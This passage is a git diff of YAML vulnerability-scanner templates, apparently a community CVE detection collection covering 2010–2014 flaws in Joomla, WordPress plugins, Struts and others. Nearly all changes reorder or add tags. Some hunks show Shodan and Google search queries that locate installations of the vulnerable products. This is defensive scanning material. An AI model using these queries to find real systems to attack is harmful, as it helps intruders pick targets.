cve2010,joomla,lfi,edb,cve,danieljamesscott + tags: cve,cve2010,joomla,lfi,edb,danieljamesscott http: - method: GET diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 9c8c59e8dc..5c7d3dad00 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -27,7 +27,7 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" - tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi + tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi http: - method: GET diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 37c55cc45b..74df63f5c9 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: visocrea product: com_joomla_visites - tags: joomla,lfi,edb,cve,cve2010,visocrea + tags: cve,cve2010,joomla,lfi,edb,visocrea http: - method: GET diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 1f104bcb7c..020e2e18b8 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: xmlswf product: com_picsell - tags: edb,cve,cve2010,joomla,lfi,xmlswf + tags: cve,cve2010,edb,joomla,lfi,xmlswf http: - method: GET diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 123ebd7f49..ad6c8127fb 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: 4you-studio product: com_jphone - tags: lfi,edb,packetstorm,cve,cve2010,joomla,4you-studio + tags: cve,cve2010,lfi,edb,packetstorm,joomla,4you-studio http: - method: GET diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index aba32eb286..e05d6a9015 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: artica product: pandora_fms - tags: seclists,phpshowtime,edb,cve,cve2010,lfi,joomla,artica + tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica http: - method: GET diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 4dbae68153..844a683bfa 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: fxwebdesign product: com_jradio - tags: cve2010,joomla,lfi,edb,packetstorm,cve,fxwebdesign + tags: cve2010,cve,joomla,lfi,edb,packetstorm,fxwebdesign http: - method: GET diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 4a1c1bd897..a84b7ec54a 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: miniwork product: com_canteen - tags: joomla,lfi,edb,packetstorm,cve,cve2010,miniwork + tags: cve2010,cve,joomla,lfi,edb,packetstorm,miniwork,sqli http: - method: GET diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 4060c4e39c..bf78574591 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: harmistechnology product: com_jejob - tags: cve,cve2010,joomla,lfi,edb,harmistechnology + tags: cve,cve2010,joomla,lfi,edb,harmistechnology,sqli http: - method: GET diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 05e054c6da..6bc6d1d87e 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: joobi product: com_jstore - tags: cve,cve2010,joomla,lfi,edb,packetstorm,joobi + tags: cve2010,cve,joomla,lfi,edb,packetstorm,joobi http: - method: GET diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 5528047a15..fb05de9eff 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -26,7 +26,7 @@ info: vendor: mikoviny product: wp_custom_pages google-query: inurl:"/wp-content/plugins/wp-custom-pages/" - tags: edb,cve,cve2011,wordpress,wp-plugin,lfi,mikoviny + tags: cve,cve2011,edb,wordpress,wp-plugin,lfi,mikoviny http: - method: GET diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index c74b6299d4..be16a3ae9b 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: tiki product: tikiwiki_cms\/groupware - tags: seclists,cve,cve2011,xss,tikiwiki,tiki + tags: cve,cve2011,seclists,xss,tikiwiki,tiki http: - method: GET diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 6b03042dfc..3bd4658fd9 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -27,7 +27,7 @@ info: vendor: simplerealtytheme product: advanced_text_widget_plugin google-query: inurl:"/wp-content/plugins/advanced-text-widget" - tags: cve,cve2011,wordpress,xss,wp-plugin,simplerealtytheme + tags: cve2011,cve,wordpress,xss,wp-plugin,simplerealtytheme http: - raw: diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index c9a04bd4f9..ef171840b1 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: foobla product: com_obsuggest - tags: lfi,edb,cve,cve2011,joomla,foobla + tags: cve,cve2011,lfi,edb,joomla,foobla http: - method: GET diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 81fc43e5a7..bb5a729024 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -28,7 +28,7 @@ info: vendor: bueltge product: adminimize google-query: inurl:"/wp-content/plugins/adminimize/" - tags: cve,cve2011,wordpress,xss,wp-plugin,bueltge + tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge http: - method: GET diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 1c32f3d60a..0649b016ab 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -26,7 +26,7 @@ info: vendor: clickdesk product: clickdesk_live_support-live_chat_plugin google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" - tags: cve,cve2011,wordpress,xss,wp-plugin,clickdesk + tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk http: - method: GET diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 348c2ec18e..13bc685895 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -25,7 +25,7 @@ info: vendor: featurific_for_wordpress_project product: featurific-for-wordpress google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" - tags: cve,cve2011,wordpress,xss,wp-plugin,featurific_for_wordpress_project + tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project http: - method: GET diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index cbcaad14ed..28f513386b 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: apache product: struts - tags: cve2012,apache,rce,struts,java,edb,cve + tags: cve,cve2012,apache,rce,struts,java,edb http: - method: GET diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 990069c471..166fedc8aa 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -30,7 +30,7 @@ info: vendor: apache product: struts shodan-query: html:"Struts Problem Report" - tags: ognl,injection,edb,cve,cve2012,apache,struts + tags: cve,cve2012,ognl,injection,edb,apache,struts variables: first: "{{rand_int(1000, 9999)}}" second: "{{rand_int(1000, 9999)}}" diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 7e797d39ce..c2116f7e6c 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -28,7 +28,7 @@ info: vendor: count_per_day_project product: count_per_day google-query: inurl:"/wp-content/plugins/count-per-day" - tags: packetstorm,cve,cve2012,lfi,wordpress,wp-plugin,traversal,count_per_day_project + tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project http: - method: GET diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 45f5774a28..290a33ef87 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -26,7 +26,7 @@ info: vendor: attenzione product: yousaytoo google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" - tags: wp-plugin,packetstorm,cve,cve2012,wordpress,xss,attenzione + tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione http: - method: GET diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index cb6a21c41a..bc7be4a4d6 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: kybernetika product: phpshowtime - tags: phpshowtime,edb,cve,cve2012,lfi,kybernetika + tags: cve,cve2012,phpshowtime,edb,lfi,kybernetika http: - method: GET diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index fe71b944ea..3db20d0ac5 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: openemr product: openemr - tags: lfi,openemr,traversal,edb,cve,cve2012 + tags: cve,cve2012,lfi,openemr,traversal,edb http: - method: GET diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 03f626eedf..c61f5cea04 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: php product: php - tags: cve2012,kev,vulhub,rce,php,cve + tags: cve,cve2012,kev,vulhub,rce,php http: - raw: diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index a6268c69f2..c849f3545b 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mnt-tech product: wp-facethumb - tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin,mnt-tech + tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech http: - method: GET diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index 47ed6cfce5..dda48bef20 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -29,7 +29,7 @@ info: vendor: websitepanel product: websitepanel shodan-query: title:"WebsitePanel" html:"login" - tags: packetstorm,cve,cve2012,redirect,websitepanel,authenticated + tags: cve,cve2012,packetstorm,redirect,websitepanel,authenticated http: - raw: diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 2a497a6055..812d706ac9 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mysqldumper product: mysqldumper - tags: packetstorm,cve,cve2012,lfi,edb,mysqldumper + tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss http: - method: GET diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 720cccde78..a732be88c7 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: laurent_destailleur product: awstats - tags: cve,cve2012,xss,awstats,edb,laurent_destailleur + tags: cve2012,cve,xss,awstats,edb,laurent_destailleur http: - method: GET diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index b72890168b..58df5088f2 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -27,7 +27,7 @@ info: vendor: mikejolley product: download_monitor framework: wordpress - tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress,mikejolley + tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley http: - method: GET diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 469e05ae91..51b607f5bb 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: flatnux product: flatnux - tags: cve2012,lfi,traversal,edb,packetstorm,cve,flatnux + tags: cve,cve2012,lfi,traversal,edb,packetstorm,flatnux,xss http: - method: GET diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 86f4edfdf3..749c69d2ae 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: gecad product: axigen_free_mail_server - tags: edb,cve,cve2012,axigen,lfi,mail,gecad + tags: cve,cve2012,edb,axigen,lfi,mail,gecad http: - method: GET diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 2b9e972953..c5b48da6b2 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: wordpress_integrator_project product: wordpress_integrator - tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve,wordpress_integrator_project + tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project http: - method: GET diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 0a0ffb53c8..0b8dd8b133 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: apache product: struts - tags: cve,cve2013,apache,rce,struts,ognl + tags: cve2013,cve,apache,rce,struts,ognl http: - method: POST diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index 1727ea4635..fe88b392c3 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: apache product: struts - tags: cve,cve2013,apache,redirect,struts,edb + tags: cve2013,cve,apache,redirect,struts,edb http: - method: GET diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 9e8277fe07..06d9867715 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -26,7 +26,7 @@ info: max-request: 9 vendor: apache product: struts - tags: cve,cve2013,rce,struts,apache,ognl,kev + tags: cve2013,cve,rce,struts,apache,ognl,kev http: - raw: diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index cd0a6e533f..e0ab00a2b0 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: telaen_project product: telaen - tags: cve,cve2012,telaen,redirect,telaen_project + tags: cve2013,cve,telaen,redirect,telaen_project http: - method: GET diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index b755c01603..71126752fe 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -26,7 +26,7 @@ info: vendor: wptrafficanalyzer product: trafficanalyzer google-query: inurl:"/wp-content/plugins/trafficanalyzer" - tags: packetstorm,cve,cve2013,wordpress,xss,wp-plugin,wptrafficanalyzer + tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer http: - method: GET diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index d96d3518d3..c5fb07ba93 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -25,7 +25,7 @@ info: max-request: 10 vendor: oracle product: fusion_middleware - tags: edb,cve,cve2013,lfi,javafaces,oracle + tags: cve,cve2013,edb,lfi,javafaces,oracle http: - method: GET diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 53ebaa578c..c3c0c0178a 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -28,7 +28,7 @@ info: vendor: anshul_sharma product: category-grid-view-gallery google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" - tags: seclists,packetstorm,cve2013,wordpress,xss,wp-plugin,cve + tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma http: - method: GET diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index dc3fb151c8..4d35426b4d 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -27,7 +27,7 @@ info: vendor: cory_lamle product: duplicator google-query: inurl:"/wp-content/plugins/duplicator" - tags: seclists,cve,cve2013,wordpress,xss,wp-plugin,packetstorm,cory_lamle + tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle http: - method: GET diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index d60c8c4129..567df07732 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: cisco product: unified_communications_manager - tags: cve,cve2013,lfi,cisco,edb + tags: cve2013,cve,lfi,cisco,edb http: - method: GET diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 707d599fc7..5d03db0878 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: springsignage product: xibo - tags: cve,cve2013,lfi,edb,springsignage + tags: cve2013,cve,lfi,edb,springsignage http: - method: GET diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 1a97f266f0..4ce02ecb4f 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -30,7 +30,7 @@ info: product: dhtmlxspreadsheet framework: wordpress google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet - tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin,dhtmlx + tags: cve2013,cve,wp,wpscan,wordpress,xss,wp-plugin,dhtmlx http: - raw: diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index f2bc6a6480..4dbf06ef5f 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: synacor product: zimbra_collaboration_suite - tags: packetstorm,zimbra,lfi,edb,cve,cve2013,synacor + tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor http: - method: GET diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 56e3304741..9e5fcd14f9 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -28,7 +28,7 @@ info: vendor: westerndeal product: advanced_dewplayer google-query: inurl:"/wp-content/plugins/advanced-dewplayer/" - tags: wp-plugin,lfi,edb,seclists,cve,cve2013,wordpress,westerndeal + tags: cve,cve2013,wp-plugin,lfi,edb,seclists,wordpress,westerndeal http: - method: GET diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 808e595179..7821207191 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2013,xstream,deserialization,rce,oast,xstream_project + tags: cve2013,cve,xstream,deserialization,rce,oast,xstream_project http: - raw: diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 788156ebc0..5b03e70665 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: domphp product: domphp - tags: cve,cve2014,lfi,edb,domphp + tags: cve2014,cve,lfi,edb,domphp http: - method: GET diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 3cf15beb09..1613d2c0b9 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: eyou product: eyou - tags: seclists,rce,eyou + tags: cve2014,cve,seclists,rce,eyou http: - raw: diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index ef02d73f39..acf009db33 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: zte product: f460 - tags: iot,cve,cve2014,zte + tags: cve2014,cve,iot,zte http: - method: GET diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 1caa0c73a1..f812e9d60b 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: lighttpd product: lighttpd - tags: lighttpd,injection,seclists,cve,cve2014,sqli + tags: cve2014,cve,lighttpd,injection,seclists,sqli http: - raw: diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 4cb056a41d..7991c0e9a1 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -29,7 +29,7 @@ info: max-request: 11 vendor: dompdf product: dompdf - tags: cve,lfi,wp-plugin,wpscan,cve2014,dompdf,wordpress,wp,edb,seclists + tags: cve2014,cve,lfi,wp-plugin,wpscan,dompdf,wordpress,wp,edb,seclists http: - method: GET diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index b0bf85d474..a4d483f372 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: siemens product: simatic_s7_cpu_1200_firmware - tags: cve,cve2014,xss,siemens,edb + tags: cve2014,cve,xss,siemens,edb http: - method: GET diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 4a8fd9bfc1..6acbc2d135 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: belkin product: n150_f9k1009_firmware - tags: cve,cve2014,lfi,router,firmware,traversal,belkin + tags: cve2014,cve,lfi,router,firmware,traversal,belkin http: - method: GET diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index 192fc321cd..bf35b5ce3c 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: elasticsearch product: elasticsearch - tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic + tags: cve2014,cve,rce,elasticsearch,kev,vulhub,elastic http: - raw: diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 8aba1bbc10..0c2d9554b7 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: seagate product: blackarmor_nas_220_firmware - tags: cve,cve2014,seagate,rce,edb + tags: cve2014,cve,seagate,rce,edb http: - raw: diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 30ed9237db..2c5b68ff60 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -29,7 +29,7 @@ info: vendor: drupal product: drupal shodan-query: http.component:"drupal" - tags: edb,cve,cve2014,drupal,sqli + tags: cve2014,cve,edb,drupal,sqli variables: num: "999999999" diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 56201c5447..1902744bfe 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: nodejs product: node.js - tags: cve,cve2014,lfi,nodejs,st + tags: cve2014,cve,lfi,nodejs,st http: - method: GET diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 240a63cf48..8cecaadeb5 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -28,7 +28,7 @@ info: vendor: oracle product: fusion_middleware shodan-query: title:"Weblogic" - tags: seclists,cve,cve2014,weblogic,oracle,ssrf,oast + tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss http: - method: GET diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 1c1320c4c3..0e04f2e2d2 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -26,7 +26,7 @@ info: product: activehelper_livehelp_live_chat framework: wordpress google-query: inurl:"/wp-content/plugins/activehelper-livehelp" - tags: cve,cve2014,wordpress,xss,wp-plugin,activehelper + tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper http: - method: GET diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 07f581a9c9..0d3c63fe58 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -26,7 +26,7 @@ info: vendor: import_legacy_media_project product: import_legacy_media framework: wordpress - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth,import_legacy_media_project + tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project http: - method: GET diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index ea96f726a5..8e4f1a4c45 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -28,7 +28,7 @@ info: product: infusionsoft_gravity_forms framework: wordpress google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth,katz + tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz http: - method: GET diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index bb26d88096..6662a34e0a 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -26,7 +26,7 @@ info: vendor: movies_project product: movies framework: wordpress - tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth,movies_project + tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project http: - method: GET diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 7e927c78d9..5c0fedfc5c 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -26,7 +26,7 @@ info: vendor: podcast_channels_project product: podcast_channels framework: wordpress - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth,podcast_channels_project + tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,podcast_channels_project http: - method: GET diff --git 